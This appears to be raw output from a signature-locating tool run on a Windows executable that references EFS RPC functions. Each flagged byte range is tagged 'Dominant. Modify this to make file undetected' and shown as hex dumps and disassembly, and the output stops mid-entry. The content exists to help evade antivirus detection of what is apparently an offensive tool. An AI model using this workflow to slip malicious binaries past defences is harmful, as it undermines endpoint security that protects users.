0000DBA0   C4 08 85 C0 7E 0A 8B C6 89 85 04 FF FF FF EB 06    ....~...........

Match 62: 57328 (size: 1088)

Dominant. Modify this to make file undetected

.text

0000DFF0   24 EB F1 8B 75 08 8B FF 8A 06 0A C0 74 0C 83 C6    $...u.......t...
0000E000   01 0F A3 04 24 73 F1 8D 46 FF 83 C4 20 5E C9 C3    ....$s..F... ^..
0000E010   8B FF 55 8B EC 51 51 A1 04 A0 41 00 33 C5 89 45    ..U..QQ...A.3..E
0000E020   FC 53 56 8B 75 18 57 85 F6 7E 14 56 FF 75 14 E8    .SV.u.W..~.V.u..
0000E030   1B 14 00 00 59 3B C6 59 8D 70 01 7C 02 8B F0 8B    ....Y;.Y.p.|....
0000E040   7D 24 85 FF 75 0B 8B 45 08 8B 00 8B 78 08 89 7D    }$..u..E....x..}
0000E050   24 33 C0 39 45 28 6A 00 6A 00 0F 95 C0 56 FF 75    $3.9E(j.j....V.u
0000E060   14 8D 04 C5 01 00 00 00 50 57 E8 F4 B0 FF FF 8B    ........PW......
0000E070   D0 83 C4 18 89 55 F8 85 D2 0F 84 58 01 00 00 8D    .....U.....X....
0000E080   04 12 8D 48 08 3B C1 1B C0 23 C1 74 35 3D 00 04    ...H.;...#.t5=..
0000E090   00 00 77 13 E8 C7 2F 00 00 8B DC 85 DB 74 1E C7    ..w.../......t..
0000E0A0   03 CC CC 00 00 EB 13 50 E8 8A 89 FF FF 8B D8 59    .......P.......Y
0000E0B0   85 DB 74 09 C7 03 DD DD 00 00 83 C3 08 8B 55 F8    ..t...........U.
0000E0C0   EB 02 33 DB 85 DB 0F 84 00 01 00 00 52 53 56 FF    ..3.........RSV.
0000E0D0   75 14 6A 01 57 E8 89 B0 FF FF 83 C4 18 85 C0 0F    u.j.W...........
0000E0E0   84 E7 00 00 00 8B 7D F8 33 C0 50 50 50 50 50 57    ......}.3.PPPPPW
0000E0F0   53 FF 75 10 FF 75 0C E8 D8 82 FF FF 8B F0 85 F6    S.u..u..........
0000E100   0F 84 C6 00 00 00 BA 00 04 00 00 85 55 10 74 38    ............U.t8
0000E110   8B 45 20 85 C0 0F 84 B3 00 00 00 3B F0 0F 8F A9    .E ........;....
0000E120   00 00 00 33 C9 51 51 51 50 FF 75 1C 57 53 FF 75    ...3.QQQP.u.WS.u
0000E130   10 FF 75 0C E8 9B 82 FF FF 8B F0 85 F6 0F 85 8B    ..u.............
0000E140   00 00 00 E9 84 00 00 00 8D 04 36 8D 48 08 3B C1    ..........6.H.;.
0000E150   1B C0 23 C1 74 2F 3B C2 77 13 E8 01 2F 00 00 8B    ..#.t/;.w.../...
0000E160   FC 85 FF 74 60 C7 07 CC CC 00 00 EB 13 50 E8 C4    ...t`........P..
0000E170   88 FF FF 8B F8 59 85 FF 74 4B C7 07 DD DD 00 00    .....Y..tK......
0000E180   83 C7 08 EB 02 33 FF 85 FF 74 3A 6A 00 6A 00 6A    .....3...t:j.j.j
0000E190   00 56 57 FF 75 F8 53 FF 75 10 FF 75 0C E8 32 82    .VW.u.S.u..u..2.
0000E1A0   FF FF 85 C0 74 1F 33 C0 50 50 39 45 20 75 3A 50    ....t.3.PP9E u:P
0000E1B0   50 56 57 50 FF 75 24 E8 23 B0 FF FF 8B F0 83 C4    PVWP.u$.#.......
0000E1C0   20 85 F6 75 2C 57 E8 4E BC FF FF 59 33 F6 53 E8     ..u,W.N...Y3.S.
0000E1D0   45 BC FF FF 59 8B C6 8D 65 EC 5F 5E 5B 8B 4D FC    E...Y...e._^[.M.
0000E1E0   33 CD E8 F2 28 FF FF C9 C3 FF 75 20 FF 75 1C EB    3...(.....u .u..
0000E1F0   C0 57 E8 22 BC FF FF 59 EB D4 8B FF 55 8B EC 83    .W."...Y....U...
0000E200   EC 10 FF 75 08 8D 4D F0 E8 19 4A FF FF FF 75 28    ...u..M...J...u(
0000E210   8D 45 F4 FF 75 24 FF 75 20 FF 75 1C FF 75 18 FF    .E..u$.u .u..u..
0000E220   75 14 FF 75 10 FF 75 0C 50 E8 E2 FD FF FF 83 C4    u..u..u.P.......
0000E230   24 80 7D FC 00 74 0A 8B 4D F0 83 A1 50 03 00 00    $.}..t..M...P...
0000E240   FD C9 C3 E8 4C AC FF FF 33 C9 84 C0 0F 94 C1 8B    ....L...3.......
0000E250   C1 C3 8B FF 55 8B EC 83 3D 20 AF 41 00 00 56 75    ....U...= .A..Vu
0000E260   48 83 7D 08 00 75 17 E8 3F 7D FF FF C7 00 16 00    H.}..u..?}......
0000E270   00 00 E8 77 7C FF FF B8 FF FF FF 7F EB 3E 83 7D    ...w|........>.}
0000E280   0C 00 74 E3 BE FF FF FF 7F 39 75 10 76 14 E8 18    ..t......9u.v...
0000E290   7D FF FF C7 00 16 00 00 00 E8 50 7C FF FF 8B C6    }.........P|....
0000E2A0   EB 1A 5E 5D E9 D6 00 00 00 6A 00 FF 75 10 FF 75    ..^].....j..u..u
0000E2B0   0C FF 75 08 E8 06 00 00 00 83 C4 10 5E 5D C3 8B    ..u.........^]..
0000E2C0   FF 55 8B EC 83 EC 10 57 8B 7D 10 85 FF 75 07 33    .U.....W.}...u.3
0000E2D0   C0 E9 A6 00 00 00 83 7D 08 00 75 1A E8 CA 7C FF    .......}..u...|.
0000E2E0   FF C7 00 16 00 00 00 E8 02 7C FF FF B8 FF FF FF    .........|......
0000E2F0   7F E9 86 00 00 00 83 7D 0C 00 74 E0 56 BE FF FF    .......}..t.V...
0000E300   FF 7F 3B FE 76 12 E8 A0 7C FF FF C7 00 16 00 00    ..;.v...|.......
0000E310   00 E8 D8 7B FF FF EB 61 FF 75 14 8D 4D F0 E8 03    ...{...a.u..M...
0000E320   49 FF FF 8B 45 F4 57 FF 75 0C 8B 80 A4 00 00 00    I...E.W.u.......
0000E330   85 C0 75 0F FF 75 08 E8 43 00 00 00 83 C4 0C 8B    ..u..u..C.......
0000E340   F0 EB 26 57 FF 75 08 68 01 10 00 00 50 E8 19 11    ..&W.u.h....P...
0000E350   00 00 83 C4 18 85 C0 75 0D E8 4D 7C FF FF C7 00    .......u..M|....
0000E360   16 00 00 00 EB 03 8D 70 FE 80 7D FC 00 74 0A 8B    .......p..}..t..
0000E370   4D F0 83 A1 50 03 00 00 FD 8B C6 5E 5F C9 C3 8B    M...P......^_...
0000E380   FF 55 8B EC 8B 4D 10 85 C9 75 04 33 C0 5D C3 53    .U...M...u.3.].S
0000E390   8B 5D 0C 56 57 8B 7D 08 0F B7 17 8D 42 BF 83 F8    .].VW.}.....B...
0000E3A0   19 77 03 83 C2 20 0F B7 33 83 C7 02 8D 46 BF 83    .w... ..3....F..
0000E3B0   F8 19 77 03 83 C6 20 8B C2 83 C3 02 2B C6 75 09    ..w... .....+.u.
0000E3C0   85 D2 74 05 83 E9 01 75 CF 5F 5E 5B 5D C3 8B FF    ..t....u._^[]...
0000E3D0   55 8B EC 83 7D 08 00 75 15 E8 CD 7B FF FF C7 00    U...}..u...{....
0000E3E0   16 00 00 00 E8 05 7B FF FF 83 C8 FF 5D C3 FF 75    ......{.....]..u
0000E3F0   08 6A 00 FF 35 B0 B3 41 00 FF 15 00 21 41 00 5D    .j..5..A....!A.]
0000E400   C3 8B FF 55 8B EC 57 8B 7D 08 85 FF 75 0B FF 75    ...U..W.}...u..u
0000E410   0C E8 21 86 FF FF 59 EB 24 56 8B 75 0C 85 F6 75    ..!...Y.$V.u...u
0000E420   09 57 E8 F4 7B FF FF 59 EB 10 83 FE E0 76 25 E8    .W..{..Y.....v%.

Match 63: 62224 (size: 816)

Dominant. Modify this to make file undetected

.text

0000F310   E1 3F 8B C1 8B D1 D1 E8 33 F6 0F B6 C0 46 23 C6    .?......3....F#.
0000F320   23 D6 C1 E0 04 C1 E2 05 0B D0 8B C1 C1 E8 02 0F    #...............
0000F330   B6 C0 23 C6 C1 E0 03 0B D0 8B C1 C1 E8 03 0F B6    ..#.............
0000F340   C0 23 C6 C1 E0 02 0B D0 8B C1 C1 E8 04 0F B6 C0    .#..............
0000F350   23 C6 C1 E9 05 0B D0 0F B6 C1 23 C6 8D 7D E0 03    #.........#..}..
0000F360   C0 6A 07 0B D0 33 C0 59 F3 AB D9 75 E0 8B 4D E4    .j...3.Y...u..M.
0000F370   8B C1 33 C2 83 E0 3F 33 C8 89 4D E4 D9 65 E0 C1    ..3...?3..M..e..
0000F380   EB 18 83 E3 3F 8B C3 8B CB D1 E8 23 CE 0F B6 C0    ....?......#....
0000F390   23 C6 C1 E1 05 C1 E0 04 0B C8 8B C3 C1 E8 02 0F    #...............
0000F3A0   B6 C0 23 C6 C1 E0 03 0B C8 8B C3 C1 E8 03 0F B6    ..#.............
0000F3B0   C0 23 C6 C1 E0 02 0B C8 8B C3 C1 E8 04 0F B6 C0    .#..............
0000F3C0   23 C6 0B C8 C1 EB 05 0F B6 C3 23 C6 03 C0 5F 0B    #.........#..._.
0000F3D0   C8 39 35 18 AC 41 00 5E 5B 7C 16 0F AE 5D FC 8B    .95..A.^[|...]..
0000F3E0   45 FC 83 E1 3F 83 E0 C0 0B C1 89 45 FC 0F AE 55    E...?......E...U
0000F3F0   FC C9 C3 8B FF 55 8B EC FF 05 D0 AC 41 00 56 8B    .....U......A.V.
0000F400   75 08 57 6A 01 BF 00 10 00 00 57 E8 AE 6B FF FF    u.Wj......W..k..
0000F410   6A 00 89 46 04 E8 01 6C FF FF 83 C4 0C 8D 46 0C    j..F...l......F.
0000F420   83 7E 04 00 74 08 6A 40 59 F0 09 08 EB 11 B9 00    .~..t.j@Y.......
0000F430   04 00 00 F0 09 08 8D 46 14 6A 02 89 46 04 5F 89    .......F.j..F._.
0000F440   7E 18 8B 46 04 83 66 08 00 5F 89 06 5E 5D C3 8B    ~..F..f.._..^]..
0000F450   FF 55 8B EC 8B 4D 08 33 C0 38 01 74 0C 3B 45 0C    .U...M.3.8.t.;E.
0000F460   74 07 40 80 3C 08 00 75 F4 5D C3 8B FF 55 8B EC    t.@.<..u.]...U..
0000F470   56 8B 75 14 85 F6 7E 0D 56 FF 75 10 E8 1D 79 FF    V.u...~.V.u...y.
0000F480   FF 59 59 8B F0 8B 45 1C 85 C0 7E 0B 50 FF 75 18    .YY...E...~.P.u.
0000F490   E8 09 79 FF FF 59 59 85 F6 74 1E 85 C0 74 1A 33    ..y..YY..t...t.3
0000F4A0   C9 51 51 51 50 FF 75 18 56 FF 75 10 FF 75 0C FF    .QQQP.u.V.u..u..
0000F4B0   75 08 E8 76 6D FF FF EB 14 2B F0 75 05 6A 02 5E    u..vm....+.u.j.^
0000F4C0   EB 09 C1 FE 1F 83 E6 FE 83 C6 03 8B C6 5E 5D C3    .............^].
0000F4D0   33 C0 50 50 6A 03 50 6A 03 68 00 00 00 40 68 78    3.PPj.Pj.h...@hx
0000F4E0   70 41 00 FF 15 08 20 41 00 A3 A0 A8 41 00 C3 8B    pA.... A....A...
0000F4F0   0D A0 A8 41 00 83 F9 FE 75 0B E8 D1 FF FF FF 8B    ...A....u.......
0000F500   0D A0 A8 41 00 33 C0 83 F9 FF 0F 95 C0 C3 A1 A0    ...A.3..........
0000F510   A8 41 00 83 F8 FF 74 0C 83 F8 FE 74 07 50 FF 15    .A....t....t.P..
0000F520   40 20 41 00 C3 8B FF 55 8B EC 56 6A 00 FF 75 10    @ A....U..Vj..u.
0000F530   FF 75 0C FF 75 08 FF 35 A0 A8 41 00 FF 15 04 20    .u..u..5..A.... 
0000F540   41 00 8B F0 85 F6 75 2D FF 15 48 20 41 00 83 F8    A.....u-..H A...
0000F550   06 75 22 E8 B6 FF FF FF E8 73 FF FF FF 56 FF 75    .u"......s...V.u
0000F560   10 FF 75 0C FF 75 08 FF 35 A0 A8 41 00 FF 15 04    ..u..u..5..A....
0000F570   20 41 00 8B F0 8B C6 5E 5D C3 6A 0A FF 15 1C 20     A.....^].j.... 
0000F580   41 00 A3 F8 B3 41 00 33 C0 C3 CC CC CC CC CC CC    A....A.3........
0000F590   55 8B EC 83 EC 08 83 E4 F0 DD 1C 24 F3 0F 7E 04    U..........$..~.
0000F5A0   24 E8 08 00 00 00 C9 C3 66 0F 12 44 24 04 BA 00    $.......f..D$...
0000F5B0   00 00 00 66 0F 28 E8 66 0F 14 C0 66 0F 73 D5 34    ...f.(.f...f.s.4
0000F5C0   66 0F C5 CD 00 66 0F 28 0D 90 70 41 00 66 0F 28    f....f.(..pA.f.(
0000F5D0   15 A0 70 41 00 66 0F 28 1D 00 71 41 00 66 0F 28    ..pA.f.(..qA.f.(
0000F5E0   25 B0 70 41 00 66 0F 28 35 C0 70 41 00 66 0F 54    %.pA.f.(5.pA.f.T
0000F5F0   C1 66 0F 56 C3 66 0F 58 E0 66 0F C5 C4 00 25 F0    .f.V.f.X.f....%.
0000F600   07 00 00 66 0F 28 A0 C0 76 41 00 66 0F 28 B8 B0    ...f.(..vA.f.(..
0000F610   72 41 00 66 0F 54 F0 66 0F 5C C6 66 0F 59 F4 66    rA.f.T.f.\.f.Y.f
0000F620   0F 5C F2 F2 0F 58 FE 66 0F 59 C4 66 0F 28 E0 66    .\...X.f.Y.f.(.f
0000F630   0F 58 C6 81 E1 FF 0F 00 00 83 E9 01 81 F9 FD 07    .X..............

Match 64: 69568 (size: 272)

Dominant. Modify this to make file undetected

.text

00010FC0   D1 D8 0B DB 75 F4 F7 F1 8B F0 F7 64 24 1C 8B C8    ....u......d$...
00010FD0   8B 44 24 18 F7 E6 03 D1 72 0E 3B 54 24 14 77 08    .D$.....r.;T$.w.
00010FE0   72 0F 3B 44 24 10 76 09 4E 2B 44 24 18 1B 54 24    r.;D$.v.N+D$..T$
00010FF0   1C 33 DB 2B 44 24 10 1B 54 24 14 4D 79 07 F7 DA    .3.+D$..T$.My...
00011000   F7 D8 83 DA 00 8B CA 8B D3 8B D9 8B C8 8B C6 4F    ...............O
00011010   75 07 F7 DA F7 D8 83 DA 00 5D 5E 5F C2 10 00 CC    u........]^_....
00011020   80 F9 40 73 15 80 F9 20 73 06 0F A5 C2 D3 E0 C3    ..@s... s.......
00011030   8B D0 33 C0 80 E1 1F D3 E2 C3 33 C0 33 D2 C3 CC    ..3.......3.3...
00011040   80 F9 40 73 15 80 F9 20 73 06 0F AD D0 D3 EA C3    ..@s... s.......
00011050   8B C2 33 D2 80 E1 1F D3 E8 C3 33 C0 33 D2 C3 CC    ..3.......3.3...
00011060   51 8D 4C 24 08 2B C8 83 E1 0F 03 C1 1B C9 0B C1    Q.L$.+..........
00011070   59 E9 1A 00 00 00 51 8D 4C 24 08 2B C8 83 E1 07    Y.....Q.L$.+....
00011080   03 C1 1B C9 0B C1 59 E9 04 00 00 00 CC CC CC CC    ......Y.........
00011090   51 8D 4C 24 04 2B C8 1B C0 F7 D0 23 C8 8B C4 25    Q.L$.+.....#...%
000110A0   00 F0 FF FF 3B C8 72 0A 8B C1 59 94 8B 00 89 04    ....;.r...Y.....
000110B0   24 C3 2D 00 10 00 00 85 00 EB E9 CC CC CC CC CC    $.-.............
000110C0   E9 0B 00 00 00 CC CC CC CC CC CC CC CC CC CC CC    ................

0x10fb2: 0x00411bb2 8b542414 mov edx, dword [arg_14h]
0x10fb6: 0x00411bb6 8b442410 mov eax, dword [arg_10h]
0x10fba: ; CODE XREF from fcn.00411b40 @ 0x411bc4(x)
0x10fba: > 0x00411bba d1eb shr ebx, 1
0x10fbc: 0x00411bbc d1d9 rcr ecx, 1
0x10fbe: 0x00411bbe d1ea shr edx, 1
0x10fc0: 0x00411bc0 d1d8 rcr eax, 1
0x10fc2: 0x00411bc2 0bdb or ebx, ebx
0x10fc4: < 0x00411bc4 75f4 jne 0x411bba
0x10fc6: 0x00411bc6 f7f1 div ecx
0x10fc8: 0x00411bc8 8bf0 mov esi, eax
0x10fca: 0x00411bca f764241c mul dword [arg_1ch]
0x10fce: 0x00411bce 8bc8 mov ecx, eax
0x10fd0: 0x00411bd0 8b442418 mov eax, dword [arg_18h]
0x10fd4: 0x00411bd4 f7e6 mul esi
0x10fd6: 0x00411bd6 03d1 add edx, ecx
0x10fd8: < 0x00411bd8 720e jb 0x411be8
0x10fda: 0x00411bda 3b542414 cmp edx, dword [arg_14h]
0x10fde: < 0x00411bde 7708 ja 0x411be8
0x10fe0: < 0x00411be0 720f jb 0x411bf1
0x10fe2: 0x00411be2 3b442410 cmp eax, dword [arg_10h]
0x10fe6: < 0x00411be6 7609 jbe 0x411bf1
0x10fe8: ; CODE XREFS from fcn.00411b40 @ 0x411bd8(x), 0x411bde(x)
0x10fe8: > 0x00411be8 4e dec esi
0x10fe9: 0x00411be9 2b442418 sub eax, dword [arg_18h]
0x10fed: 0x00411bed 1b54241c sbb edx, dword [arg_1ch]
0x10ff1: ; CODE XREFS from fcn.00411b40 @ 0x411be0(x), 0x411be6(x)
0x10ff1: > 0x00411bf1 33db xor ebx, ebx
0x10ff3: ; CODE XREF from fcn.00411b40 @ 0x411baa(x)
0x10ff3: > 0x00411bf3 2b442410 sub eax, dword [arg_10h]
0x10ff7: 0x00411bf7 1b542414 sbb edx, dword [arg_14h]
0x10ffb: 0x00411bfb 4d dec ebp
0x10ffc: < 0x00411bfc 7907 jns 0x411c05
0x10ffe: 0x00411bfe f7da neg edx
0x11000: 0x00411c00 f7d8 neg eax
0x11002: 0x00411c02 83da00 sbb edx, 0
0x11005: ; CODE XREF from fcn.00411b40 @ 0x411bfc(x)
0x11005: > 0x00411c05 8bca mov ecx, edx
0x11007: 0x00411c07 8bd3 mov edx, ebx
0x11009: 0x00411c09 8bd9 mov ebx, ecx
0x1100b: 0x00411c0b 8bc8 mov ecx, eax
0x1100d: 0x00411c0d 8bc6 mov eax, esi
0x1100f: 0x00411c0f 4f dec edi
0x11010: < 0x00411c10 7507 jne 0x411c19
0x11012: 0x00411c12 f7da neg edx
0x11014: 0x00411c14 f7d8 neg eax
0x11016: 0x00411c16 83da00 sbb edx, 0
0x11019: ; CODE XREF from fcn.00411b40 @ 0x411c10(x)
0x11019: > 0x00411c19 5d pop ebp
0x1101a: 0x00411c1a 5e pop esi
0x1101b: 0x00411c1b 5f pop edi
0x1101c: 0x00411c1c c21000 ret 0x10
0x1101f: 0x00411c1f cc int3
0x11020: ; CALL XREF from fcn.0040819a @ 0x4081dd(x)
0x11020: ; CALL XREF from fcn.0040c8c0 @ 0x40cb28(x)
0x11020: ; CALL XREFS from fcn.0040cd58 @ 0x40cfe2(x), 0x40d1a2(x)
0x11020: 31: fcn.00411c20 ();
0x11020: 0x00411c20 80f940 cmp cl, 0x40 ; '@' ; 64
0x11023: < 0x00411c23 7315 jae 0x411c3a
0x11025: 0x00411c25 80f920 cmp cl, 0x20 ; 32
0x11028: < 0x00411c28 7306 jae 0x411c30
0x1102a: 0x00411c2a 0fa5c2 shld edx, eax, cl
0x1102d: 0x00411c2d d3e0 shl eax, cl
0x1102f: 0x00411c2f c3 ret
0x11030: ; CODE XREF from fcn.00411c20 @ 0x411c28(x)
0x11030: > 0x00411c30 8bd0 mov edx, eax
0x11032: 0x00411c32 33c0 xor eax, eax
0x11034: 0x00411c34 80e11f and cl, 0x1f ; 31
0x11037: 0x00411c37 d3e2 shl edx, cl
0x11039: 0x00411c39 c3 ret
0x1103a: ; CODE XREF from fcn.00411c20 @ 0x411c23(x)
0x1103a: > 0x00411c3a 33c0 xor eax, eax
0x1103c: 0x00411c3c 33d2 xor edx, edx
0x1103e: 0x00411c3e c3 ret
0x1103f: 0x00411c3f cc int3
0x11040: ; CALL XREFS from fcn.0040819a @ 0x4081c0(x), 0x408216(x)
0x11040: ; CALL XREFS from fcn.0040823d @ 0x4083af(x), 0x40846f(x)
0x11040: ; CALL XREF from fcn.00408a58 @ 0x408a7a(x)
0x11040: 31: fcn.00411c40 ();
0x11040: 0x00411c40 80f940 cmp cl, 0x40 ; '@' ; 64
0x11043: < 0x00411c43 7315 jae 0x411c5a
0x11045: 0x00411c45 80f920 cmp cl, 0x20 ; 32
0x11048: < 0x00411c48 7306 jae 0x411c50
0x1104a: 0x00411c4a 0fadd0 shrd eax, edx, cl
0x1104d: 0x00411c4d d3ea shr edx, cl
0x1104f: 0x00411c4f c3 ret
0x11050: ; CODE XREF from fcn.00411c40 @ 0x411c48(x)
0x11050: > 0x00411c50 8bc2 mov eax, edx
0x11052: 0x00411c52 33d2 xor edx, edx
0x11054: 0x00411c54 80e11f and cl, 0x1f ; 31
0x11057: 0x00411c57 d3e8 shr eax, cl
0x11059: 0x00411c59 c3 ret
0x1105a: ; CODE XREF from fcn.00411c40 @ 0x411c43(x)
0x1105a: > 0x00411c5a 33c0 xor eax, eax
0x1105c: 0x00411c5c 33d2 xor edx, edx
0x1105e: 0x00411c5e c3 ret
0x1105f: 0x00411c5f cc int3
0x11060: ; CALL XREF from fcn.0040a916 @ 0x40a989(x)
0x11060: ; CALL XREFS from fcn.0040ec10 @ 0x40ec94(x), 0x40ed5a(x)
0x11060: 22: fcn.00411c60 (int32_t arg_8h);
0x11060: ; arg int32_t arg_8h @ esp+0x8
0x11060: 0x00411c60 51 push ecx
0x11061: 0x00411c61 8d4c2408 lea ecx, [arg_8h]
0x11065: 0x00411c65 2bc8 sub ecx, eax
0x11067: 0x00411c67 83e10f and ecx, 0xf ; 15
0x1106a: 0x00411c6a 03c1 add eax, ecx
0x1106c: 0x00411c6c 1bc9 sbb ecx, ecx
0x1106e: 0x00411c6e 0bc1 or eax, ecx
0x11070: 0x00411c70 59 pop ecx
0x11071: < 0x00411c71 e91a000000 jmp fcn.00411c90
0x11076: 0x00411c76 51 push ecx
0x11077: 0x00411c77 8d4c2408 lea ecx, [esp + 8]
0x1107b: 0x00411c7b 2bc8 sub ecx, eax
0x1107d: 0x00411c7d 83e107 and ecx, 7
0x11080: 0x00411c80 03c1 add eax, ecx
0x11082: 0x00411c82 1bc9 sbb ecx, ecx
0x11084: 0x00411c84 0bc1 or eax, ecx
0x11086: 0x00411c86 59 pop ecx
0x11087: < 0x00411c87 e904000000 jmp fcn.00411c90
0x1108c: 0x00411c8c cc int3
0x1108d: 0x00411c8d cc int3
0x1108e: 0x00411c8e cc int3
0x1108f: 0x00411c8f cc int3
0x11090: ; CALL XREF from fcn.0040bf3c @ 0x40bf46(x)
0x11090: ; CALL XREF from fcn.0040c017 @ 0x40c021(x)
0x11090: ; CALL XREF from fcn.0040c100 @ 0x40c10a(x)
0x11090: ; CODE XREF from fcn.00411c60 @ 0x411c71(x)
0x11090: ; CODE XREF from fcn.00411c60 @ +0x27(x)
0x11090: 43: fcn.00411c90 (int32_t arg_4h);
0x11090: ; arg int32_t arg_4h @ esp+0x0
0x11090: > 0x00411c90 51 push ecx
0x11091: 0x00411c91 8d4c2404 lea ecx, [arg_4h]
0x11095: 0x00411c95 2bc8 sub ecx, eax
0x11097: 0x00411c97 1bc0 sbb eax, eax
0x11099: 0x00411c99 f7d0 not eax
0x1109b: 0x00411c9b 23c8 and ecx, eax
0x1109d: 0x00411c9d 8bc4 mov eax, esp
0x1109f: 0x00411c9f 2500f0ffff and eax, 0xfffff000
0x110a4: ; CODE XREF from fcn.00411c90 @ 0x411cb9(x)
0x110a4: > 0x00411ca4 3bc8 cmp ecx, eax
0x110a6: < 0x00411ca6 720a jb 0x411cb2
0x110a8: 0x00411ca8 8bc1 mov eax, ecx
0x110aa: 0x00411caa 59 pop ecx
0x110ab: 0x00411cab 94 xchg esp, eax
0x110ac: 0x00411cac 8b00 mov eax, dword [eax]
0x110ae: 0x00411cae 890424 mov dword [esp], eax
0x110b1: 0x00411cb1 c3 ret
0x110b2: ; CODE XREF from fcn.00411c90 @ 0x411ca6(x)
0x110b2: > 0x00411cb2 2d00100000 sub eax, 0x1000
0x110b7: 0x00411cb7 8500 test dword [eax], eax
0x110b9: < 0x00411cb9 ebe9 jmp 0x411ca4
0x110bb: 0x00411cbb cc int3
0x110bc: 0x00411cbc cc int3
0x110bd: 0x00411cbd cc int3
0x110be: 0x00411cbe cc int3
0x110bf: 0x00411cbf cc int3
0x110c0: ; CALL XREF from fcn.0040cd58 @ 0x40cf1b(x)
0x110c0: 129: fcn.00411cc0 ();
0x110c0: ; var int32_t var_4h @ esp+0x4
0x110c0: ; var int32_t var_8h @ esp+0x8
0x110c0: < 0x00411cc0 e90b000000 jmp 0x411cd0
0x110c5: 0x00411cc5 cc int3
0x110c6: 0x00411cc6 cc int3
0x110c7: 0x00411cc7 cc int3
0x110c8: 0x00411cc8 cc int3
0x110c9: 0x00411cc9 cc int3
0x110ca: 0x00411cca cc int3
0x110cb: 0x00411ccb cc int3
0x110cc: 0x00411ccc cc int3
0x110cd: 0x00411ccd cc int3
0x110ce: 0x00411cce cc int3
0x110cf: 0x00411ccf cc int3
0x110d0: ; CODE XREF from fcn.00411cc0 @ 0x411cc0(x)
0x110d0: > 0x00411cd0 833d18ac4100. cmp dword [0x41ac18], 2 ; [0x41ac18:4]=0
0x110d7: < 0x00411cd7 7c08 jl 0x411ce1
0x110d9: 0x00411cd9 83ec04 sub esp, 4
0x110dc: 0x00411cdc db0c24 fisttp dword [esp]
0x110df: 0x00411cdf 58 pop eax

Match 67: 70941 (size: 16)

Dominant. Modify this to make file undetected

.rdata IMAGE_DIRECTORY_ENTRY_IAT

0001151D   00 00 00 80 1D 40 00 00 00 00 00 9A 17 40 00 00    .....@.......@..

Match 68: 70972 (size: 4)

Dominant. Modify this to make file undetected

.rdata

0001153C   40 31 40 00                                        @1@.

Match 69: 75048 (size: 3)

Dominant. Modify this to make file undetected

.rdata

00012528   62 70 40                                           bp@

Match 70: 75070 (size: 8)

Dominant. Modify this to make file undetected

.rdata

0001253E   40 00 40 AE 40 00 51 AE                            @.@.@.Q.

Match 71: 75085 (size: 16)

Dominant. Modify this to make file undetected

.rdata

0001254D   60 40 00 98 80 40 00 C4 80 40 00 AB 75 40 00 0B    `@...@...@..u@..

Match 72: 97480 (size: 16)

Dominant. Modify this to make file undetected

.rdata

00017CC8   53 00 72 00 76 00 0A 00 00 00 00 00 34 00 3A 00    S.r.v.......4.:.

0x17ca0: main 0x4012eb [DATA:r--] push str.3:_EfsRpcDecryptFileSrv_n
0x17cd4: main 0x4012f8 [DATA:r--] push str.4:_EfsRpcQueryUsersOnFile_n

Match 73: 97526 (size: 31)

Dominant. Modify this to make file undetected

.rdata

00017CF6   72 00 73 00 4F 00 6E 00 46 00 69 00 6C 00 65 00    r.s.O.n.F.i.l.e.
00017D06   0A 00 00 00 00 00 35 00 3A 00 20 00 45 00 66       ......5.:. .E.f

0x17cd4: main 0x4012f8 [DATA:r--] push str.4:_EfsRpcQueryUsersOnFile_n
0x17d0c: main 0x401305 [DATA:r--] push str.5:_EfsRpcQueryRecoveryAgents_n

Match 74: 97602 (size: 8)

Dominant. Modify this to make file undetected

.rdata

00017D42   73 00 0A 00 00 00 36 00                            s.....6.

0x17d48: main 0x401312 [DATA:r--] push str.6:_EfsRpcRemoveUsersFromFile_n
0x17d0c: main 0x401305 [DATA:r--] push str.5:_EfsRpcQueryRecoveryAgents_n

Match 75: 97648 (size: 31)

Dominant. Modify this to make file undetected

.rdata

00017D70   46 00 72 00 6F 00 6D 00 46 00 69 00 6C 00 65 00    F.r.o.m.F.i.l.e.
00017D80   0A 00 00 00 36 00 3A 00 20 00 45 00 66 00 73       ....6.:. .E.f.s

0x17d48: main 0x401312 [DATA:r--] push str.6:_EfsRpcRemoveUsersFromFile_n
0x17d84: main 0x40131f [DATA:r--] push str.6:_EfsRpcAddUsersToFile_n

Match 76: 100111 (size: 8)

Dominant. Modify this to make file undetected

.rdata IMAGE_DIRECTORY_ENTRY_IMPORT

0001870F   00 C0 94 01 00 0C 21 01                            ......!.

Match 77: 100126 (size: 15)

Dominant. Modify this to make file undetected

.rdata IMAGE_DIRECTORY_ENTRY_IMPORT

0001871E   00 00 00 00 00 00 FA 95 01 00 00 20 01 00 00       ........... ...

Match 78: 100156 (size: 244)

Dominant. Modify this to make file undetected

.rdata IMAGE_DIRECTORY_ENTRY_IMPORT

0001873C   00 00 00 00 70 97 01 00 84 99 01 00 76 99 01 00    ....p.......v...
0001874C   CC 94 01 00 E8 94 01 00 06 95 01 00 1A 95 01 00    ................
0001875C   2E 95 01 00 4A 95 01 00 64 95 01 00 7A 95 01 00    ....J...d...z...
0001876C   90 95 01 00 AA 95 01 00 C0 95 01 00 D4 95 01 00    ................
0001877C   E6 95 01 00 68 99 01 00 08 96 01 00 14 96 01 00    ....h...........
0001878C   24 96 01 00 34 96 01 00 4C 96 01 00 64 96 01 00    $...4...L...d...
0001879C   7C 96 01 00 A4 96 01 00 B0 96 01 00 BE 96 01 00    |...............
000187AC   CC 96 01 00 D6 96 01 00 E4 96 01 00 F6 96 01 00    ................
000187BC   08 97 01 00 1A 97 01 00 2A 97 01 00 36 97 01 00    ........*...6...
000187CC   4C 97 01 00 5A 97 01 00 94 99 01 00 82 97 01 00    L...Z...........
000187DC   94 97 01 00 A0 97 01 00 AC 97 01 00 BE 97 01 00    ................
000187EC   CE 97 01 00 DC 97 01 00 E8 97 01 00 FC 97 01 00    ................
000187FC   0C 98 01 00 1E 98 01 00 28 98 01 00 34 98 01 00    ........(...4...
0001880C   40 98 01 00 56 98 01 00 6C 98 01 00 86 98 01 00    @...V...l.......
0001881C   A0 98 01 00 BA 98 01 00 CA 98 01 00 DC 98 01 00    ................
0001882C   EE 98 01 00                                        ....

Match 79: 100583 (size: 31)

Dominant. Modify this to make file undetected

.rdata

000188E7   00 71 05 53 65 74 55 6E 68 61 6E 64 6C 65 64 45    .q.SetUnhandledE
000188F7   78 63 65 70 74 69 6F 6E 46 69 6C 74 65 72 00       xceptionFilter.

0x188ea:

Match 80: 100652 (size: 153)

Dominant. Modify this to make file undetected

.rdata

0001892C   00 00 89 03 49 73 50 72 6F 63 65 73 73 6F 72 46    ....IsProcessorF
